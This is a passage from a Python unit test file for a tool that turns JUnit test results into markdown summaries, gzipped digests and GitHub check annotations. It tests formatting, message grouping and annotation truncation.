UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=0,
commit='commit'
),
'https://details.url/'
), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n'
'\n'
'For more details on these failures, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_with_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=8,
commit='commit'
),
'https://details.url/'
), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x: 8 :fire:\n'
'\n'
'For more details on these errors, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_with_parse_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=2, errors=errors, suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=0,
runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=0,
commit='commit'
),
'https://details.url/'
), ('2 files 1 errors 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x:\n'
'\n'
'For more details on these parsing errors, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_with_fails_and_errors_and_parse_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=errors, suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
),
'https://details.url/'
), ('1 files 1 errors 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'\n'
'For more details on these parsing errors, failures and errors, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_without_fails_or_errors_or_parse_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=0,
runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=0,
commit='commit'
),
'https://details.url/'
), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x:\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_with_digest_md_with_single_run(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)
)
self.assertEqual(actual, '1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF'
'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0'
'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe'
'K6buousrLZAAAA')
def test_get_long_summary_with_digest_md_with_multiple_runs(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=0,
commit='commit'
)
)
self.assertEqual(actual, '1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/03MwQqDMBAE0F+RnD24aiv6M0VShaVqZJOciv'
'/e0brR28wbmK8ZeRq86TLKM+Mjh6OUKO8ofWC3oFaoGMI+1Zpf'
'PloLeFzw4RXwTDD2PAGaBIOIE0gBkbjsf+0Z9Y6KBP87IoXzjk'
'qF+51188wBRdP2A3NU1srcAAAA')
def test_get_long_summary_with_digest_md_with_test_errors(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)
)
self.assertEqual(actual, '1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP'
'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr'
'+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH'
'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA')
def test_get_long_summary_with_digest_md_with_parse_errors(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=errors, suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)
)
self.assertEqual(actual, '1 files 1 errors 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP'
'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr'
'+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH'
'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA')
def test_get_long_summary_with_digest_md_with_delta(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
), UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)
)
self.assertEqual(actual, '1 files + 2 2 suites - 3 3s :stopwatch: +4s\n'
'4 tests - 5 5 :heavy_check_mark: + 6 6 :zzz: - 7 7 :x: + 8 8 :fire: - 9 \n'
'9 runs +10 10 :heavy_check_mark: - 11 11 :zzz: +12 12 :x: - 13 13 :fire: +14 \n'
'\n'
'Results for commit 12345678. ± Comparison against type commit 01234567.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF'
'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0'
'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe'
'K6buousrLZAAAA')
def test_get_long_summary_with_digest_md_with_delta_and_parse_errors(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunDeltaResults(
files=n(1, 2), errors=errors, suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
), UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)
)
self.assertEqual(actual, '1 files + 2 1 errors 2 suites - 3 3s :stopwatch: +4s\n'
'4 tests - 5 5 :heavy_check_mark: + 6 6 :zzz: - 7 7 :x: + 8 8 :fire: - 9 \n'
'9 runs +10 10 :heavy_check_mark: - 11 11 :zzz: +12 12 :x: - 13 13 :fire: +14 \n'
'\n'
'Results for commit 12345678. ± Comparison against type commit 01234567.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF'
'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0'
'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe'
'K6buousrLZAAAA')
def test_get_long_summary_with_digest_md_with_delta_results_only(self):
with self.assertRaises(ValueError) as context:
get_long_summary_with_digest_md(UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
))
self.assertIn('stats must be UnitTestRunResults when no digest_stats is given', context.exception.args)
def test_get_case_messages(self):
results = UnitTestCaseResults([
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.0),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.1),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message2', content='content2', time=1.2),
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message2', content='content2', time=None),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message3', content='content3', time=None),
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.23),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.234),
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='error', message='message5', content='content5', time=1.2345),
])),
])),
((None, 'class2', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
]))
])
expected = CaseMessages([
((None, 'class1', 'test1'), dict([
('success', defaultdict(list, [
('content1', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.0),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.1),
])),
('content2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message2', content='content2', time=1.2),
]))
])),
('skipped', defaultdict(list, [
('message2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message2', content='content2', time=None),
])),
('message3', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message3', content='content3', time=None),
]))
])),
('failure', defaultdict(list, [
('content4', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.23),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.234),
])),
])),
('error', defaultdict(list, [
('content5', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='error', message='message5', content='content5', time=1.2345),
])),
])),
])),
((None, 'class2', 'test2'), dict([
('success', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
])),
('skipped', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
])),
('failure', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
])),
('error', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
])),
]))
])
actual = get_case_messages(results)
self.assertEqual(expected, actual)
def test_annotation_to_dict(self):
annotation = Annotation(path='file1', start_line=123, end_line=123, start_column=4, end_column=5, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2')
self.assertEqual(dict(path='file1', start_line=123, end_line=123, start_column=4, end_column=5, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), annotation.to_dict())
annotation = Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)', raw_details=None)
self.assertEqual(dict(path='class2', start_line=0, end_line=0, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)'), annotation.to_dict())
annotation = Annotation(path='file', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='message', title=None, raw_details=None)
self.assertEqual(dict(path='file', start_line=0, end_line=0, annotation_level='notice', message='message'), annotation.to_dict())
def test_annotation_to_dict_abbreviation(self):
annotation = Annotation(path='file', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='message ' * 8000, title='title - ' * 31, raw_details='raw ' * 16000)
self.assertEqual('message ' * 8000, annotation.to_dict().get('message'))
self.assertEqual('title - ' * 31, annotation.to_dict().get('title'))
self.assertEqual('raw ' * 16000, annotation.to_dict().get('raw_details'))
annotation = Annotation(path='file', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='message ' * 8001, title='title - ' * 32, raw_details='raw ' * 16001)
self.assertEqual('message ' * 3999 + 'message…ssage ' + 'message ' * 3999, annotation.to_dict().get('message'))
self.assertEqual('title - ' * 15 + 'title -…itle - ' + 'title - ' * 15, annotation.to_dict().get('title'))
self.assertEqual('raw ' * 8000 + '…aw ' + 'raw ' * 7999, annotation.to_dict().get('raw_details'))
def test_get_case_annotation(self):
messages = CaseMessages([
((None, 'class1', 'test1'), dict([
('success', dict([
('message1', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='message1', content=None, time=1.0)
]))
])),
('skipped', dict([
('message2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='message2', content=None, time=1.0)
]))
])),
('failure', dict([
('message3', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='', test_name='test1', result='failure', message='message3', content=None, time=1.0)
])),
('message4', list([
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.0),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.0)
])),
])),
('error', dict([
('message5', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='message6', content=None, time=1.0)
]))
])),
])),
((None, 'class2', 'test2'), dict([
('success', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
])),
('skipped', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
])),
('failure', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
])),
('error', dict([
(None, list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
])),
]))
])
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), get_case_annotation(messages, (None, 'class1', 'test1'), 'skipped', 'message2', report_individual_runs=False))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1\nresult-file2\nresult-file3', title='3 out of 6 runs failed: test1', raw_details='message3'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message3', report_individual_runs=False))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1\nresult-file2\nresult-file3', title='3 out of 6 runs failed: test1 (class1)', raw_details='message4'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message4', report_individual_runs=False))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 6 runs with error: test1 (class1)', raw_details='message5'), get_case_annotation(messages, (None, 'class1', 'test1'), 'error', 'message5', report_individual_runs=False))
self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 4 runs skipped: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'skipped', None, report_individual_runs=False))
self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='warning', message='result-file1', title='1 out of 4 runs failed: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'failure', None, report_individual_runs=False))
self.assertEqual(Annotation(path='class2', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 4 runs with error: test2 (class2)', raw_details=None), get_case_annotation(messages, (None, 'class2', 'test2'), 'error', None, report_individual_runs=False))
def test_get_case_annotation_report_individual_runs(self):
messages = CaseMessages([
((None, 'class1', 'test1'), dict([
('success', dict([
('message1', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='message1', content=None, time=1.0)
]))
])),
('skipped', dict([
('message2', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='message2', content=None, time=None)
]))
])),
('failure', dict([
('message3', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='', test_name='test1', result='failure', message='message3', content=None, time=1.23)
])),
('message4', list([
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.234),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='message4', content=None, time=1.234)
])),
])),
('error', dict([
('message5', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='message6', content=None, time=1.2345)
]))
])),
]))
])
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='notice', message='result-file1', title='1 out of 6 runs skipped: test1', raw_details='message2'), get_case_annotation(messages, (None, 'class1', 'test1'), 'skipped', 'message2', report_individual_runs=True))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file1', title='1 out of 6 runs failed: test1', raw_details='message3'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message3', report_individual_runs=True))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='warning', message='result-file2\nresult-file3', title='2 out of 6 runs failed: test1 (class1)', raw_details='message4'), get_case_annotation(messages, (None, 'class1', 'test1'), 'failure', 'message4', report_individual_runs=True))
self.assertEqual(Annotation(path='file1', start_line=123, end_line=123, start_column=None, end_column=None, annotation_level='failure', message='result-file1', title='1 out of 6 runs with error: test1 (class1)', raw_details='message5'), get_case_annotation(messages, (None, 'class1', 'test1'), 'error', 'message5', report_individual_runs=True))
def test_get_case_annotations(self):
results = UnitTestCaseResults([
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 1', content='fail content 1', time=1.2),
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.23),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.234)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='error message', content='error content', time=1.2345)
])),
])),
((None, 'class2', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='success', message=None, content=None, time=None)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='skipped', message=None, content=None, time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='failure', message=None, content=None, time=None)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file=None, line=None, class_name='class2', test_name='test2', result='error', message=None, content=None, time=None)
])),
]))
])
expected = [
Annotation(
annotation_level='warning',
end_column=None,
end_line=123,
message='result-file1\nresult-file2\nresult-file3',
path='file1',
start_column=None,
start_line=123,
title='3 out of 6 runs failed: test1 (class1)',
raw_details='fail content 1'
), Annotation(
annotation_level='failure',
end_column=None,
end_line=123,
message='result-file1',
path='file1',
start_column=None,
start_line=123,
title='1 out of 6 runs with error: test1 (class1)',
raw_details='error content'
), Annotation(
annotation_level='warning',
end_column=None,
end_line=0,
message='result-file1',
path='class2',
start_column=None,
start_line=0,
title='1 out of 4 runs failed: test2 (class2)',
raw_details=None
), Annotation(
annotation_level='failure',
end_column=None,
end_line=0,
message='result-file1',
path='class2',
start_column=None,
start_line=0,
title='1 out of 4 runs with error: test2 (class2)',
raw_details=None
),
]
annotations = get_case_annotations(results, report_individual_runs=False)
self.assertEqual(expected, annotations)
def test_get_case_annotations_report_individual_runs(self):
results = UnitTestCaseResults([
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 1', content='fail content 1', time=1.2),
UnitTestCase(result_file='result-file2', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.23),
UnitTestCase(result_file='result-file3', test_file='file1', line=123, class_name='class1', test_name='test1', result='failure', message='fail message 2', content='fail content 2', time=1.234)
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='error', message='error message', content='error content', time=0.1)
])),
]))
])
expected = [
Annotation(
annotation_level='warning',
end_column=None,
end_line=123,
message='result-file1',
path='file1',
start_column=None,
start_line=123,
title='1 out of 6 runs failed: test1 (class1)',
raw_details='fail content 1'
), Annotation(
annotation_level='warning',
end_column=None,
end_line=123,
message='result-file2\nresult-file3',
path='file1',
start_column=None,
start_line=123,
title='2 out of 6 runs failed: test1 (class1)',
raw_details='fail content 2'
), Annotation(
annotation_level='failure',
end_column=None,
end_line=123,
message='result-file1',
path='file1',
start_column=None,
start_line=123,
title='1 out of 6 runs with error: test1 (class1)',
raw_details='error content'
)
]
annotations = get_case_annotations(results, report_individual_runs=True)
self.assertEqual(expected, annotations)
def test_get_error_annotation(self):
self.assertEqual(Annotation(path='file', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', None, None)))
self.assertEqual(Annotation(path='file', start_line=12, end_line=12, start_column=None, end_column=None, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', 12, None)))
self.assertEqual(Annotation(path='file', start_line=12, end_line=12, start_column=34, end_column=34, annotation_level='failure', message='message', title='Error processing result file', raw_details='file'), get_error_annotation(ParseError('file', 'message', 12, 34)))
def test_get_all_tests_list_annotation(self):
results = UnitTestCaseResults([
((None, 'class1', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
])),
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
])),
(('file', 'class1', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
]))
])
self.assertIsNone(get_all_tests_list_annotation(UnitTestCaseResults()))
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There are 3 tests, see "Raw output" for the full list of tests.', title='3 tests found', raw_details='class1 ‑ test1\nclass1 ‑ test2\nfile ‑ class1 ‑ test2'), get_all_tests_list_annotation(results))
del results[(None, 'class1', 'test1')]
del results[('file', 'class1', 'test2')]
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There is 1 test, see "Raw output" for the name of the test.', title='1 test found', raw_details='class1 ‑ test2'), get_all_tests_list_annotation(results))
def test_get_skipped_tests_list_annotation(self):
results = UnitTestCaseResults([
((None, 'class1', 'test2'), dict([
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
])),
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test1', result='success', message='success message', content='success content', time=1.0)
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name=None, test_name='test1', result='skipped', message='skip message', content='skip content', time=None)
])),
])),
(('file', 'class1', 'test2'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=123, class_name='class1', test_name='test2', result='success', message='success message', content='success content', time=1.0)
])),
]))
])
self.assertIsNone(get_skipped_tests_list_annotation(UnitTestCaseResults()))
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There is 1 skipped test, see "Raw output" for the name of the skipped test.', title='1 skipped test found', raw_details='class1 ‑ test2'), get_skipped_tests_list_annotation(results))
del results[(None, 'class1', 'test1')]['success']
self.assertEqual(Annotation(path='.github', start_line=0, end_line=0, start_column=None, end_column=None, annotation_level='notice', message='There are 2 skipped tests, see "Raw output" for the full list of skipped tests.', title='2 skipped tests found', raw_details='class1 ‑ test1\nclass1 ‑ test2'), get_skipped_tests_list_annotation(results))
def test_files(self):
parsed = parse_junit_xml_files(['files/junit.gloo.elastic.spark.tf.xml',
'files/junit.gloo.elastic.spark.torch.xml',
'files/junit.gloo.elastic.xml',
'files/junit.gloo.standalone.xml',
'files/junit.gloo.static.xml',
